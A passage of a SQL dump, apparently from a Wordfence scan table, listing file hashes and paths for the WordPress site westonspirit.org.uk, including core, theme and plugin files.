ublic_html/wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71d2b8e2e4583182d748836df9864433e32b06fd','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-matchesmapregex.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71dab01f189bacde9706ebf1feb8148948842fa2','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-recovery-mode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71e41302496863979485fb310bd672e4aad7aade','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/content/content-single.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71e6dbefcb3e17e7b4d3ed89dc796c4a3ba6fd96','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/autoload-php7.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71f9f5ec40a7eb8e94296b8c28307e5677346305','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-network-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'721db219a0d14860955a671cde38c17be8c419ef','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Author.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'726520cc9de13d6afb810823aad32fb29e95a6ba','/home/westonspirit.org.uk/public_html/wp-includes/class-requests.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'729d83e96f48eb2a3dd26efb871ab7d46f95dfc7','/home/westonspirit.org.uk/public_html/xmlrpc-s.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'72e0661c9cb0e45c719969a16974cf193fd8d1e5','/home/westonspirit.org.uk/public_html/wp-admin/theme-install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'72ede0b6e074980639f607c48f24059f75a5f594','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7324a0d5e47eefd4bba7443b126e60f889b580c3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'73338b807fd5a10fed2005f4a687e9ab378332ca','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'734ec068c5402d215c940db4c8220739a1c80cf0','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/random.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'736107ef0f43732e7b5f685d5ce68b12dc3a78c6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/tab-base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'73711304ae753d4011f4e8a667b9b168c71f1179','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'737920d39cb9ac25a1a4fa5e3a95e8e1de43b132','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'73cfb64827ea1920d30d2b9327548a452a853203','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/debug/classes/theme-missing.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'73f40db061da17d44942a99a0eb128b8a6c589b7','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'740fde1e11d6664b6f6330f7a6f71ae1c4bd4472','/home/westonspirit.org.uk/public_html/wp-includes/post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'74187c897311ebccb53f9177e9d2cb59ce073d37','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-toggled-select.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7428cc23ba0a51b945baf68e0fdb470d975a865d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/app.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7436f6c84530f89fc18504fd4d787ae65e3929a1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'743f8da1cce57e5920038a48ba4c5eb8bb6f1090','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Crypto32.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'743fd2a1ad1de6c80645a0efc7fa1a7bf0f473fd','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'74527b00b7c694a0bc9f5bfbde00ee4ae7b194e8','/home/westonspirit.org.uk/public_html/wp-admin/includes/nav-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7469e8ea053d22fa87a64cfaaeba31ec6145dbd8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'747b901e40f5bc088c1885cea6dd6bacfb73be39','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/templates/raw.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'74a0f5df1a1659575963fa8586d5416834482859','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'74b8cac601614ac8af633152e1e18cbb409c008b','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-background-image-setting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'754b875dea500e7f598e6367adfd6d1226d64da2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/waf-install-manual.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'754e961d17269da467bd6cdc59e5b573c29c925d','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'755231d0c03222ee27d24ef89b017c5c41298fb3','/home/westonspirit.org.uk/public_html/wp-includes/class-json.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'755bb4bf728451eced45821d4c211b8021c7234b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/safe-mode/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'759dcf2f990b4e3730fd76b92559cba19321183c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'75a12e82bc350571752138c36f79c814b9b08763','/home/westonspirit.org.uk/public_html/wp-content/plugins/akismat/sym.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'75a6b8492781278f2a5227b70d0750f1a6441f8e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'75c3a29a227571e84a8c7baf3d87c2a1db583fbe','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-capabilities.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'75ce7144ad07b96cba635ea171fb0040188b4c46','/home/westonspirit.org.uk/public_html/wp-admin/options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'75e614debfe30f2cb18e0c7f7384e6d8dedd4d31','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Enclosure.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'75e6ee1e6ffebdacf874979a0d35459bd7df2637','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'760b029c16e20fc5424699e990c000f661a1cc01','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/document.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7623c3fc079eb7d52993a8f55a640b873f76839a','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7627038a5018dea325ac763795100b9e2cdffb65','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/categories/general.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'763d187205d7f2f9fb7f1a2a26e6869604a75e64','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/templates/template-full-width.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7650190e1c185220b1ecc783ddeedb16ea0a019c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7686dadc74897c393a43fc09d0297bd0783010c4','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/filter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'768b1901694478fb8a42f8c37c2a8d45112e6229','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/wp-post-type.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7696761251d35673c312000ff7be1144e2543388','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7703ff26987f6d6315e335564c8539a80efb8b86','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/editor-wrapper.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7771b77928739fe082c6e5d2e699b8c94a413111','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/controls/repeater.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7793cb1d7544df5d468068887fc4c3ce366f2f62','/home/westonspirit.org.uk/public_html/wp-admin/includes/user.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'779e873f1749f6e853cf4c08d04ffa8e54a5ee31','/home/westonspirit.org.uk/public_html/wp-includes/option.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'77bd38a12882b8b0fbd838eac16197f8f69f0feb','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/class-wp-rest-server.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'77d4a1003379822e96aad795fb4781c4143279e7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/server.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'77fd5bf2c63ce028463e09a7dc8e79be83ee38b2','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/schemes/typography.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'780f46565aa31df53bfd9c9db880423bba372d18','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'783fa5f6d782945f8eaf95e6ad8023b36701fa23','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-plugin-upgrader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'78553c96ceded743d345f5bd5252cbcc2e2a9ba6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/assets/json/json-handler.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'785c250f8708ba9086b2b2fcfb379559f5c53d02','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-error.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'78aa1cc88f530b13d3fd580ec8f2ea238277386a','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/database-upgrader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'78cab2e873ea693341ed92aebf2fcbea25e1efe7','/home/westonspirit.org.uk/public_html/wp-admin/user/freedoms.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'78dc354fa0caf01c9aecd604393576ecf1ea9e3c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/template-tags.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'78e677719bc7d2491c12dc3d594fd4e3fbc48540','/home/westonspirit.org.uk/public_html/wp-includes/bookmark-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'78ecca50cc79715e4777b901bb6cb7086699c2de','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'790c534fb7dbedc8c15fcd417e2dd3a7e22fad38','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-section.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'792443cb2453776795f7915afabb0c9a1796f985','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/wordpress-widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'793cd4deb1c1dfd487e1055770b1cb60e85a57e5','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7964e3e3cba20367f808e66fa55c6133adcdc22e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/beta-testers.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7970f33d41d9e82312eb458c4e734ce660afb64d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/button.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'79a1845a2bf1bb32edf4591f06adf660ed98e435','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/views/trash-kit-confirmation.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'79b1835da8baa727034d985b990c0949d18fd627','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_tools.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'79d463a182edbd6817be47432afd2ae7f95f7e2b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/categories/edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'79d9056950f83e1d61da88b76580763a47dd8c52','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'79f3940d10848911cad7b5e6848c88c032319e18','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a0e1c82be04105bca9c782dae17e0e99768852c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a0e9ed4bce80ba18d9fc8494b577f8f7794e682','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a16f210de2980e336ba44feb85eb4ec225b7099','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-ds.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a57d7ffdc81575c717f63fa9eb3b4b867868bed','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/cookie.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a6cd04ccd7cc9e31245766a2d41832f3ee5f44c','/home/westonspirit.org.uk/public_html/wp-includes/class-feed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a79dbf6ecb5e7016988df85799dabc19fadc5db','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7a9005cf0ef108f311b66b98ec219e596cb60682','/home/westonspirit.org.uk/public_html/wp-admin/network/edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7aa8c407df6646e9700bf44803ec1511ff8d7777','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.tag.lyrics3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7aeb67a137044522f13182599383312984002256','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/fixer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7b30a2aec439cf8bc86ba2558b2f88c7407f0ac9','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/402.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7b783229fe720ddcc1e6968b073891ab44a8ef68','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c3062e711714dbdd74f56c3a2c2d6019b5f64c1','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c5b727abf42691eceaa095fb06b2cf0613dc13e','/home/westonspirit.org.uk/public_html/wp-includes/class-pop3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c632b079d791baf810a62c2e4d4b5c44ed844bb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/db.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c71f016cb736ffccb956c6a88f4b57b296be2e6','/home/westonspirit.org.uk/public_html/wp-admin/includes/screen.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c790e29b2fb14fcc06f68663672c6f3a4aa42e8','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/testimonial.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c8a0abce258211d2a8ec38e8caac879941c4815','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7c9be3aeedf2096363ae03e57264f1c236ab7ed3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/base/controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7caab47b42e256d1b2d214873d874d76afd23685','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/base/element-base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7cca921f1bb2a2357fe81d9ae556e133ab0dcbd6','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/class-wp-sitemaps-index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7ce709c9a4fc7996bcdd04fa389e91c5e2b007b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7cefc6e6cee439c470e0f812f41e0a6ce131e266','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d41f74e7b21ce6541dda7d563e85d7cdf55754e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/responsive/files/frontend.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d49de9fc601783339a7791fde8efc9490352832','/home/westonspirit.org.uk/public_html/wp-links-opml.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d58fd2bc139a402ebb5aac55f49dc4a377eae2d','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-streams.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d64ef26ad58e14af13ff20046f9ae74ef767015','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/log/log-404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d67d62577520ad08ba7a5ebc28c4c413cd27368','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d8e8c58cc5e1b865d4128dcd1913e1770578169','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/search.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7d96bfe9a6d025548d5cf6f0eacac9a2a9826649','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/library/documents/page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7dab606eb1d6821e7cf68b054e290539c5985241','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/elements-color-picker/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7dc1e3036379da1615393f2139635758d031b48f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/elements.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7de945a3cbd1fe458f2e1e400d78fc58a71740e4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7dedecbc31132a20ece3dc330a3eda50929d9be7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7e1dc55b5199275196d72dbab3339212d69652d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/schemes/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7e23c78161b3a2956373a433422cc51a06baaf21','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7e6214169d59a274f00bdfa4b17fa737f0a30af9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfUnlockMsg.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7e6347abbac6fa591966e110b630e9828621972f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/options-group-performance.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7e8acf1a12c5a88e36c781a40e225c8961f16e9f','/home/westonspirit.org.uk/public_html/wp-admin/user/credits.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7eb05e443efe8e4b1e505f0948a44092064069e7','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio.dts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7ee452af11766eb8d67b39f1329d14c83797c134','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/url.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7ee6064e22b484eb7482edca45592f8e0a5c7eac','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7ee7a8e61b32792b179058b7f95cd5b0f187c1fd','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Registry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7f244559fd5d65d96f13155ebe0fd87ada1611d6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/document-types/post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7f2c6736984708143b8601c3bde85c33822d95b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7f49192fbcedb8921b3457143e58a5495da76599','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfCrawl.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7fce795407c0863375aa86c85a2b8de81be0f87d','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/two-buttons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'801d98ef3defd4a13f93a74db147a7dfa2e37a3b','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-text.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'80267e04ee64718070a8cd116e24b0c0a2025ebc','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/navigator.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'802bae3ccfd23e197933ed3d7c535e414c36f4b1','/home/westonspirit.org.uk/public_html/wp-admin/user/admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8047bd228b4db55b0a9584693d188acda3bb3480','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-custom-css-setting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'805573ee96f87e20449d08fc5a5746482b38acbe','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/elements/column.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'80dd4f81f633ce19cddce6088d9967f9656e84af','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/waf-install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8113fb92b7cc91833513025fc63dcd3f6e5920b6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/theme-style-buttons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8130ec45a7d20e34b6efef2fd8de8cfeaaebd980','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/customizer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8132b158fcc816cc9bc76c607718b338b7463aff','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/image.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8181347cd581785d85f01e04c78be82b680d7fee','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81857f96717b315071a3845cf515c528d29fde0d','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'818dfd66dcd8e103f5ff04073635bc4f3cb6507b','/home/westonspirit.org.uk/public_html/wp-includes/feed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8191cb2bbd7d208dd325b9289e5187d90766f344','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'8197cf4215dabeb39d91fb2e1dbc79fa5479cc09','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-color-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'819c101ad36b59946af54833a63dd03127e6cb22','/home/westonspirit.org.uk/public_html/wp-includes/https-migration.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81a774a5faa15cddd3c7df0f0140d7bdaf89544b','/home/westonspirit.org.uk/public_html/wp-includes/locale.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81b6d9c69cdfd11d30397e486de7c25f064c36e7','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Transport.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81c5e57488fc612b30ed5824612273d5c00f2e50','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/fileio/json.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81c86f15436fabc1035946f6aedbc22237da693d','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/pagination.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'81